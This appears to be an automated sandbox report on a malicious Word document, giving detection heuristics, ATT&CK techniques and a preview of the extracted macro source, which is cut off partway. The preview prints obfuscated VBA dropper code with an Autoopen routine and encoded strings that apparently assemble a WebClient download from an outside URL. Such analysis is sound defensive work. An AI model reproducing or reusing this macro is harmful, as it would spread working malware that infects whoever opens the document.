MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical heuristic, indicating an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6545119-0' further supports its nature as a dropper. The primary function of the VBA script appears to be the execution of a secondary payload, though the exact nature of the payload is not discernible from the provided script excerpt.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6545234-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6545234-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 129128 bytes |
SHA-256: ea21cc2f3b6e5e103389dbeb426986dabeb96fcaf77893fa56c9acd6311a31e6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RJbLhFwrNmV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub dhMPzR(mNtbGO)
RnRPWA = zzWfH
LMOuji = kbLAs
FOacF = tNjnE + Sgn(69181 - tmjiq - pmZazz + Fix(85516)) - 53970 - CDbl(20641)
qbRWP = 89705
End Sub
Sub WWQNNS(ZKKUlR)
sUPCV = obdMpj
sLmNz = pJMZWc
wAopX = tHwHBT + Sgn(88395 - IvtEY - QjNYwV + Fix(73870)) - 53179 - CDbl(90099)
usaAjo = 73821
pwptuE = tFkhNS
wwDNm = sCERM
MJtti = IFOZo + Sgn(43861 - JnDQBt - NZuczW + Fix(2345)) - 41219 - CDbl(92280)
uYhdsb = 99188
GNFNG = JjZdd
lCXfDn = RvISn
bfQpL = MEEuj + Sgn(53600 - SVSQz - sHBrA + Fix(3210)) - 48352 - CDbl(10065)
iQwuR = 8512
End Sub
Sub ttrNMQ(hHrDDU)
wfLvvB = oPnmL
WnwlKv = cYZjLb
UjJzV = TjlnzW + Sgn(5573 - FiDbA - OtLFt + Fix(15682)) - 65150 - CDbl(32553)
FbjUd = 10618
GpRbj = CIlosh
uVILK = bXDEN
CJfLQ = YzAXN + Sgn(19779 - lbqCU - PAufj + Fix(37335)) - 46428 - CDbl(19470)
ijClD = 47916
End Sub
Sub Autoopen()
On Error Resume Next
dWwVmT = WWIzmY
kUjzzC = ivssr
VTUcG = HwTGwT + Sgn(91309 - XIbVl - mtMTmG + Fix(43607)) - 40397 - CDbl(98482)
EduPMC = 3758
SzSziNJbYb (rmRkQO + oRbQafbovOfE + jCjkVU)
GGSbH = pAdmw
BVYjGV = viwTC
zjGDnk = GhWnzk + Sgn(89706 - qrJil - NPHWd + Fix(28717)) - 29869 - CDbl(47255)
HnPwKS = 67369
End Sub
Sub qCVlUw(iWaFEm)
oQFkUz = JVNioP
hlkiH = TcPmsQ
nHnJT = Rwzta + Sgn(96295 - PjjHDf - kBkqXz + Fix(85349)) - 42825 - CDbl(22887)
SrDcu = 5642
DOizCi = JkXfnw
iNhlm = zmWNv
wajuHV = wDozmi + Sgn(36918 - hmZMjP - kdWrHj + Fix(70014)) - 33246 - CDbl(84859)
BPjQa = 80732
KJzEu = uDSdQ
zAMWFq = XQNwO
wckSjb = wICZS + Sgn(76852 - ObnpCU - vUoti + Fix(50431)) - 40617 - CDbl(34843)
zNiSz = 75383
End Sub
Sub ljBJD(wnERAr)
cYuuVB = vYEBl
IFMjVs = RBFAKO
VBoMZ = WYZSoz + Sgn(91923 - OMiAYY - taVvHQ + Fix(58553)) - 51206 - CDbl(36007)
jGumtk = 84805
End Sub
Attribute VB_Name = "HIkftuYwwDp"
Sub Ampaca(QROrz)
ZEqAs = cmYQP
NhaXKT = lsswRU
SQbKt = mZTqi + Sgn(92212 - iNnbV - iPttt + Fix(13033)) - 89004 - CDbl(31411)
OjHYj = 66143
End Sub
Function oRbQafbovOfE()
On Error Resume Next
LLOXw = nNjpO
sYERa = puZXiD
AaLmiJ = VhBcN + Sgn(97541 - VbfJDr - XoJPhj + Fix(83050)) - 77248 - CDbl(54200)
dKYwjc = 51850
dLJsi = cGzkn
qBJDa = MNIOKD
SbjLC = CRqwq + Sgn(16570 - hihumW - vDVpnu + Fix(3996)) - 41457 - CDbl(34207)
OAFjQ = 90977
LWsIhsDraYz = crGQAY("KZz4.rXz) )69]Raq", 36947 + 2 - 36947, 36947 + 8 - 36947)
vvhluz = SubCh
NcnPQO = qXHBj
akpDS = jlzqp + Sgn(6496 - DTXtS - nmBmMq + Fix(30310)) - 2239 - CDbl(79201)
XnjEt = 48041
jnDUlz = iBasv
Efncff = XDsljB
YRuKP = PSqHL + Sgn(26741 - jwEvL - BiJYi + Fix(1661)) - 13330 - CDbl(59315)
cuRnk = 61861
mAmvb = crGQAY("odMJG'of'+';'+')e'+'HoeeHo+e'+5r", 35899 + 3 - 35899, 35899 + 25 - 35899)
QHPckU = pfQRIL
zzaQzm = sQJIj
pvqXd = sfzfif + Sgn(65140 - UtNjwT - dzrXkt + Fix(54319)) - 45711 - CDbl(81813)
UEKzt = 79533
SrEksJ = NdBMzw
kWdYAP = GDjflB
piUVTC = BYYBpn + Sgn(66073 - cQLvE - dkBzSI + Fix(22416)) - 78775 - CDbl(46296)
GHDXz = 63817
FPbtHKhdFN = crGQAY("%J7S7+'ot'+9P", 85768 + 3 - 85768, 85768 + 6 - 85768)
fwCiwF = LctDa
TqzsM = SYBtRM
TuhjK = vZjzB + Sgn(1731 - fimpOI - HkQKL + Fix(21640)) - 10803 - CDbl(27840)
iClVw = 71206
HGbkZ = IZsDAZ
KjiLji = bXoBB
dGfPu = TNrsHA + Sgn(39224 - Dbbidr - njsZY + Fix(50266)) - 90292 - CDbl(88970)
SZjBKB = 88354
RQBtAiWMF = crGQAY("qv3;t'+'nei'+'l'+'CbeW'+'.teN.m'+'e.i,", 54403 + 4 - 54403, 54403 + 32 - 54403)
JBGiSr = LLqEzv
XKVpa = pVYYTH
hRThBh = YckUVp + Sgn(33024 - Mjquo - CYjUb + Fix(11762)) - 74820 - CDbl(76822)
iOLRtt = 85549
iYtHNk = zFKCQR
KVOfK = FhKdlo
kGoaFt = VpGzh + Sgn(85892 - lrlTdt - ojailJ + Fix(41832)) - 1065 - CDbl(26882)
VYHHs = 32552
jOOTMLkbG = crGQAY("bwYp'+'S.eHo'+'/mKaFCZh/o'+'tua/lp'+'.notrako'+'rue//:ptth@'+'/p'+'WREU8NQrP", 16656 + 4 - 16656, 16656 + 70 - 16656)
zXBwVO = wRpUq
KIviw = OsTju
bqcIk =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.